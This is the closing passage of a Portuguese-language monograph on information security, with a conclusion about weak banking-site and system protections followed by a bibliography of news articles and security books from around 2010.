A partir do texto contido nesta monografia, pode-se deduzir que boa parte dos atuais e
mais utilizados sistemas e procedimentos responsáveis por manter ou garantir a segurança de
informações, mostram-se ineficientes ou insuficientes e, as maneiras mais utilizadas para
mitigar tais problemas devem ser consideradas. Também é possível concluir que, a
substituição do simples aconselhamento pela demonstração das falhas e vulnerabilidades dos
sistemas e processos pode representar uma boa forma de diminuir os incidentes relacionados à
segurança de informações.
Baseando-se no conteúdo deste trabalho, também é possível concluir que muito se
ganha ao avaliar a real efetividade dos mecanismos de segurança oferecidos pelos fabricantes
de softwares e equipamentos. A sensação de segurança que algumas empresas e instituições
financeiras tentam passar aos usuários de seus sistemas pode resultar em conclusões errôneas,
como, por exemplo, a de que ataques de crackers são raros, inofensivos e direcionados a
pessoas ou entidades específicas.
Somente com o entendimento dos exemplos aqui apresentados, espera-se que um
usuário, cujos conhecimentos em informática não ultrapassam os básicos necessários para
acessar o site de uma instituição financeira, desconfie que dados secretos de sua conta
corrente podem ser desviados, mesmo após visualização de cadeados de segurança,
mensagens dizendo que o site é seguro, ainda que seja utilizada criptografia nos dados da
conexão e a empresa afirme que seu sistema de segurança é infalível.
É possível também concluir que, soluções tecnológicas e equipamentos eletrônicos,
em geral, são passíveis de fraude e, a desconfiança em pessoas, arquivos e processos que
aparentam ser seguros, é um dos primeiros passos para a proteção contra atos ardilosos e
criminosos cometidos dentro do âmbito computacional.
87
6 Referências bibliográficas
AGÊNCIA ESTADO. Hacker pede US$ 500 mil a banco e é preso em SP. Publicada
em 08/06/2010. Disponível em http://www.estadao.com.br/noticias/geral,hacker-pede-us-500-
mil-a-banco-e-e-preso-em-sp,563266,0.htm. Acesso em 15/09/2010.
ASSUNÇÃO, Marcos Flávio de. Guia do Hacker Brasileiro. Editora Visual Books,
Florianópolis, 2002.
FILHO, Wilson Leite da Silva. Análise teórica e prática da segurança de redes sem fio na
cidade de São Paulo. Disponível em http://www.icofcs.org/2009/ICoFCS2009-PP12.pdf.
Acesso em 12/11/2010.
G1SP, Portal de notícias da Globo. Quadrilha escolhia vítimas para sequestro pela internet,
diz polícia. Disponível em http://g1.globo.com/sao-paulo/noticia/2010/08/quadrilha-escolhe-
vitimas-para-sequestro-pela-internet-diz-policia.html Acesso em 09/10.2010.
MOREIRA, Daniela. Invasão de privacidade: bisbilhotar a vida do seu par pode dar cadeia.
Disponível em http://idgnow.uol.com.br/internet/2006/06/09/idgnoticia.2006-06-
09.9405240970/IDGNoticia_view/. Acesso em 07/09/2010.
RUFINO, Nelson Murilo de. Segurança Nacional. Técnicas de ataque e defesa em redes de
computadores. São Paulo, Editora Novatec, 2002.
SBARAI, Rafael. Cada vez mais exposição no facebook. Revista Veja on-line. Disponível em
http://veja.abril.com.br/noticia/vida-digital/cada-vez-mais-exposicao-facebook-privacidade
Publicada em 20/05/2010. Acesso em 15/09/2010.
SIQUEIRA, Carol. Identidade com chip começará a ser emitida ainda neste ano. Notícias da
câmara dos deputados. Disponível em
http://www2.camara.gov.br/agencia/noticias/SEGURANCA/149977-IDENTIDADE-COM-
CHIP-COMECARA-A-SER-EMITIDA-AINDA-NESTE-ANO.html. Acesso em 15/09/2010.
SIQUEIRA, Flávio Augusto Maretti Sgrilli. Furto, supressão de dados sigilosos consignados
em sites na internet de acesso restrito e o estelionato virtual. Disponível em
http://jusvi.com/artigos/500. Acesso em 07/09/2010.
TANENBAUM, Andrew. Computer Networks. 4 Ed. Amsterdam, Editora Prentice Hall, 2003.
URIBE, Gustavo. Cracker que invadiu site do PMDB ataca PSDB. Disponível em
http://www.estadao.com.br/noticias/nacional,cracker-que-invadiu-site-do-pmdb-ataca-
psdb,540451,0.htm. Acesso em 16/09/2010.
VALLE, James Della. 'Internet banking' seguro: proteja-se das ameaças virtuais. Disponível
em http://veja.abril.com.br/noticia/vida-digital/internet-banking-seguro-proteja-se-ameacas-
virtuais. Acesso em 01/11/2010.